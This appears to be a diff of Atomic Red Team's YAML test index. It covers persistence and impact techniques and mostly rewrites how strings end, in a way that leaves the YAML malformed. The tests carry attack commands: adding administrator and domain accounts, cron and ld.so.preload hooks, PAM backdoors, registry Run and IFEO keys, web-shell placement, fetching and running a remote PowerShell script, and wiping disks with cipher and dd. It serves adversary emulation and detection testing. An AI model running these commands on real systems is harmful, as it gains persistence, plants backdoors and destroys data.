@@ -42196,10 +42196,10 @@ persistence: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} -' + ' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} -' + ' name: command_prompt elevation_required: true T1136.003: @@ -42269,7 +42269,7 @@ persistence: activity do not interupt the normal functions of the compromised users and can remain undetected for a long time -' + ' supported_platforms: - iaas:aws input_arguments: @@ -42280,21 +42280,21 @@ persistence: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured -' + ' prereq_command: 'cat ~/.aws/credentials | grep "default" -' + ' get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure -' + ' executor: command: 'aws iam create-user --user-name #{username} -' + ' cleanup_command: 'aws iam delete-user --user-name #{username} -' + ' name: sh elevation_required: false T1078.004: @@ -42360,7 +42360,7 @@ persistence: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. -' + ' supported_platforms: - google-workspace - windows @@ -42395,20 +42395,20 @@ persistence: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet -' + ' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud -' + ' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" -' + ' T1542.002: technique: created: '2019-12-19T20:21:21.669Z' @@ -42645,7 +42645,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: 
@@ -42656,17 +42656,17 @@ persistence: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get cronjobs -n #{namespace} -' + ' name: bash elevation_required: false - name: CreateCronjob @@ -42678,7 +42678,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -42689,20 +42689,20 @@ persistence: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} -' + ' cleanup_command: 'kubectl delete cronjob art -n #{namespace} -' + ' name: bash elevation_required: false T1136: @@ -42884,7 +42884,7 @@ persistence: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -42904,7 +42904,7 @@ persistence: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -42912,7 +42912,7 @@ persistence: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -42944,7 +42944,7 @@ persistence: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: 
@@ -42961,10 +42961,10 @@ persistence: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 @@ -43139,10 +43139,10 @@ persistence: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -43150,7 +43150,7 @@ persistence: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -43270,7 +43270,7 @@ persistence: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows input_arguments: @@ -43281,10 +43281,10 @@ persistence: executor: command: 'net user #{guest_user} /active:yes -' + ' cleanup_command: 'net user #{guest_user} /active:no -' + ' name: command_prompt elevation_required: true T1136.002: @@ -43336,7 +43336,7 @@ persistence: auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 description: 'Creates a new domain admin user in a command prompt. -' + ' supported_platforms: - windows input_arguments: 
@@ -43358,14 +43358,14 @@ persistence: net group "#{group}" "#{username}" /add /domain cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain -' + ' name: command_prompt elevation_required: false - name: Create a new account similar to ANONYMOUS LOGON auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt. -' + ' supported_platforms: - windows input_arguments: @@ -43380,10 +43380,10 @@ persistence: executor: command: 'net user "#{username}" "#{password}" /add /domain -' + ' cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain -' + ' name: command_prompt elevation_required: false - name: Create a new Domain Account using PowerShell @@ -43391,7 +43391,7 @@ persistence: description: 'Creates a new Domain User using the credentials of the Current User -' + ' supported_platforms: - windows input_arguments: @@ -43420,7 +43420,7 @@ persistence: $User cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1" -' + ' name: powershell elevation_required: false T1078.002: @@ -43783,21 +43783,21 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD 
@@ -43822,18 +43822,18 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1546.014: technique: @@ -43894,7 +43894,7 @@ persistence: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 -' + ' supported_platforms: - macos input_arguments: @@ -44183,7 +44183,7 @@ persistence: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list -' + ' supported_platforms: - windows input_arguments: @@ -44196,12 +44196,12 @@ persistence: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" -' + ' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -44421,7 +44421,7 @@ persistence: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: 
@@ -44437,19 +44437,19 @@ persistence: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" -' + ' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -44633,7 +44633,7 @@ persistence: description: 'This test uses the insmod command to load a kernel module for Linux. -' + ' supported_platforms: - linux input_arguments: @@ -44657,10 +44657,10 @@ persistence: dependencies: - description: 'The kernel module must exist on disk at specified location -' + ' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -44669,7 +44669,7 @@ persistence: executor: command: 'sudo insmod #{module_path} -' + ' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -44875,7 +44875,7 @@ persistence: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it -' + ' supported_platforms: - macos input_arguments: @@ -44892,15 +44892,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; -' + ' executor: name: bash elevation_required: true 
@@ -44994,7 +44994,7 @@ persistence: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` -' + ' supported_platforms: - macos input_arguments: @@ -45011,15 +45011,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; -' + ' executor: name: bash elevation_required: true @@ -45163,7 +45163,7 @@ persistence: auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 description: 'Create a user via useradd -' + ' supported_platforms: - linux input_arguments: @@ -45174,17 +45174,17 @@ persistence: executor: command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} -' + ' cleanup_command: 'userdel #{username} -' + ' name: bash elevation_required: true - name: Create a user account on a MacOS system auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2' description: 'Creates a user on a MacOS system with dscl -' + ' supported_platforms: - macos input_arguments: @@ -45206,7 +45206,7 @@ persistence: dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} cleanup_command: 'dscl . -delete /Users/#{username} -' + ' name: bash elevation_required: true - name: Create a new user in a command prompt @@ -45228,10 +45228,10 @@ persistence: executor: command: 'net user /add "#{username}" "#{password}" -' + ' cleanup_command: 'net user /del "#{username}" >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create a new user in PowerShell 
@@ -45249,10 +45249,10 @@ persistence: executor: command: 'New-LocalUser -Name "#{username}" -NoPassword -' + ' cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Create a new user in Linux with `root` UID and GID. @@ -45260,7 +45260,7 @@ persistence: description: 'Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. -' + ' supported_platforms: - linux input_arguments: @@ -45278,14 +45278,14 @@ persistence: if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi; cleanup_command: 'userdel #{username} -' + ' name: bash elevation_required: true - name: Create a new Windows admin user auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 description: 'Creates a new admin user in a command prompt. -' + ' supported_platforms: - windows input_arguments: @@ -45303,7 +45303,7 @@ persistence: net localgroup administrators "#{username}" /add cleanup_command: 'net user /del "#{username}" >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1078.003: @@ -45431,7 +45431,7 @@ persistence: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script -' + ' supported_platforms: - macos executor: @@ -45660,7 +45660,7 @@ persistence: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files -' + ' supported_platforms: - windows input_arguments: @@ -45671,7 +45671,7 @@ persistence: executor: command: 'netsh.exe add helper #{helper_file} -' + ' name: command_prompt T1556.004: technique: 
@@ -46040,11 +46040,11 @@ persistence: command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}" -' + ' cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /f >nul 2>&1 -' + ' name: command_prompt T1137.003: technique: @@ -46179,11 +46179,11 @@ persistence: command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f -' + ' cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f >nul 2>&1 -' + ' T1137.005: technique: external_references: @@ -46304,7 +46304,7 @@ persistence: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. -' + ' supported_platforms: - windows input_arguments: @@ -46317,14 +46317,14 @@ persistence: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) -' + ' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own password filter dll" -' + ' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -46740,7 +46740,7 @@ persistence: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories -' + ' supported_platforms: - macos executor: @@ -46847,10 +46847,10 @@ persistence: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | 
@@ -46884,35 +46884,35 @@ persistence: - description: 'The PAM development library must be installed to build the PAM module -' + ' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi -' + ' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) -' + ' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} -' + ' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' T1205.001: technique: external_references: @@ -47045,11 +47045,11 @@ persistence: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ -' + ' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1546.013: @@ -47135,7 +47135,7 @@ persistence: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -47151,13 +47151,13 @@ persistence: dependencies: - description: 'Ensure a powershell profile exists for the current user -' + ' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force -' + ' executor: command: | Add-Content #{ps_profile} -Value "" 
@@ -47375,14 +47375,14 @@ persistence: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common -' + ' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common -' + ' supported_platforms: - linux executor: @@ -47398,12 +47398,12 @@ persistence: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi -' + ' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local -' + ' supported_platforms: - linux executor: @@ -47419,7 +47419,7 @@ persistence: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi -' + ' T1542.004: technique: created: '2020-10-20T00:05:48.790Z' @@ -47545,10 +47545,10 @@ persistence: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} -' + ' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook -' + ' elevation_required: true name: sh T1108: @@ -47743,11 +47743,11 @@ persistence: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" -' + ' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 -' + ' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -47765,11 +47765,11 @@ persistence: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" -' + ' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce 
@@ -47795,7 +47795,7 @@ persistence: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -48016,10 +48016,10 @@ persistence: ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi; -' + ' cleanup_command: 'unset ssh_authorized_keys -' + ' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' @@ -48117,7 +48117,7 @@ persistence: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: - windows input_arguments: @@ -48134,10 +48134,10 @@ persistence: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -48173,11 +48173,11 @@ persistence: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -48199,7 +48199,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -48216,7 +48216,7 @@ persistence: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null 
@@ -48227,7 +48227,7 @@ persistence: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -48240,7 +48240,7 @@ persistence: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. -' + ' supported_platforms: - windows executor: @@ -48252,7 +48252,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 -' + ' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -48388,7 +48388,7 @@ persistence: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. -' + ' supported_platforms: - windows input_arguments: @@ -48698,7 +48698,7 @@ persistence: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: @@ -48718,22 +48718,22 @@ persistence: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1547.009: technique: @@ -48806,7 +48806,7 @@ persistence: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 -' + ' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 
@@ -48907,10 +48907,10 @@ persistence: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist -' + ' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist -' + ' name: sh elevation_required: true T1542.001: @@ -49087,7 +49087,7 @@ persistence: description: 'This test creates a Systemd service unit file and enables it as a service. -' + ' supported_platforms: - linux input_arguments: @@ -49160,15 +49160,15 @@ persistence: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. -' + ' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. -' + ' executor: name: bash elevation_required: true @@ -49320,20 +49320,20 @@ persistence: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -49350,20 +49350,20 @@ persistence: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer 
@@ -49665,13 +49665,13 @@ persistence: dependencies: - description: 'Microsoft Exchange SnapIn must be installed -' + ' prereq_command: 'Get-TransportAgent -TransportService FrontEnd -' + ' get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn -' + ' executor: command: | Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} @@ -49883,7 +49883,7 @@ persistence: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user -' + ' supported_platforms: - macos - linux @@ -49895,13 +49895,13 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile -' + ' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user -' + ' supported_platforms: - macos - linux @@ -49913,7 +49913,7 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc -' + ' name: sh T1078: technique: @@ -50082,10 +50082,10 @@ persistence: dependencies: - description: 'Web shell must exist on disk at specified location (#{web_shells}) -' + ' prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" @@ -50094,7 +50094,7 @@ persistence: executor: command: 'xcopy /I /Y #{web_shells} #{web_shell_path} -' + ' cleanup_command: | del #{web_shell_path}\b.jsp /q >nul 2>&1 del #{web_shell_path}\tests.jsp /q >nul 2>&1 
@@ -50367,10 +50367,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -50403,10 +50403,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -50502,11 +50502,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -50525,11 +50525,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 
@@ -50551,7 +50551,7 @@ persistence: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore -' + ' name: powershell T1547.013: technique: @@ -50695,7 +50695,7 @@ impact: net.exe user #{user_account} #{new_password} cleanup_command: 'net.exe user #{user_account} /delete >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Delete User - Windows @@ -50703,7 +50703,7 @@ impact: description: 'Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -50725,21 +50725,21 @@ impact: auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947 description: 'This test will remove an account from the domain admins group -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Requires the Active Directory module for powershell to be installed. -' + ' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" -' + ' input_arguments: super_user: description: Account used to run the execution command (must include domain). @@ -50983,10 +50983,10 @@ impact: - description: 'Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe}) -' + ' prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force 
@@ -51017,7 +51017,7 @@ impact: command: 'dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk ''{print $5}'') iflag=count_bytes -' + ' name: bash - name: Overwrite deleted data on C drive auto_generated_guid: 321fd25e-0007-417f-adec-33232252be19 @@ -51029,7 +51029,7 @@ impact: executor: command: 'cipher.exe /w:C: -' + ' name: command_prompt T1486: technique: @@ -51109,7 +51109,7 @@ impact: auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765 description: 'Uses gpg to encrypt a file -' + ' supported_platforms: - linux input_arguments: @@ -51133,10 +51133,10 @@ impact: dependencies: - description: 'Finds where gpg is located -' + ' prereq_command: 'which_gpg=`which gpg` -' + ' get_prereq_command: "(which yum && yum -y epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n" executor: @@ -51145,15 +51145,15 @@ impact: command: 'echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path} -' + ' 